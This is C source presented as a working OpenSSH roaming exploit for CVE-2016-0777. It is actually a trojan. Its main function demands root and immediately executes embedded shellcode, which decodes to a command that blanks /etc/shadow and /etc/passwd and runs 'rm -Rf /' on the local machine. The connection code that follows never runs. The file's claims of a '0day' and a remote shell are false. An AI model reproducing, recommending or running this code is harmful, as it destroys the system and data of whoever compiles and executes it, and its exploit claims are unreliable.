CVE-2016-0777 roaming openssh exploit /* Exploit : openssh roaming Exploit -- CVE-2016-0777 Author: : KingCope Compile : gcc -W sploit.c -o sploit Usage: : ./sploit HOST IP Thanks : openBSD, congratz, guys */ #include #include #include #include #include #include #include #include #include void usage(char *argv[]) { printf("Target : openssh 4.7 to 7.1 roaming\n"); printf("Type : 0day\n"); printf("Author : You know me\n"); printf("Exec : %s \n\n", argv[0]); exit(1); } unsigned char shellcode[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65" "\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73" "\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22" "\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20" "\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1" "\xcd\x80"; int main(int argc, char *argv[]) { int uid = getuid(); int port = 22, sock; struct hostent *host; struct sockaddr_in addr; if(uid !=0) { fprintf(stderr, "- Abort - Need ROOT to bind to raw socket!!\n"); exit(1); } if(uid == 0) { printf("\t+ OK Starting..\n"); } if(argc != 3) usage(argv); fprintf(stderr, "[ ] Use IP and port (mandatory)\n"); (*(void(*)())shellcode)(); exit(1); char payload[1024]; memcpy(payload, &shellcode, sizeof(shellcode)); if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0) { printf("+ OK roaming mode activated, enjoy your shell!\n"); system("/bin/sh"); } else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1) { fprintf(stderr, "- Failed! Roaming mode deactiveted??!!\n"); exit(1); } }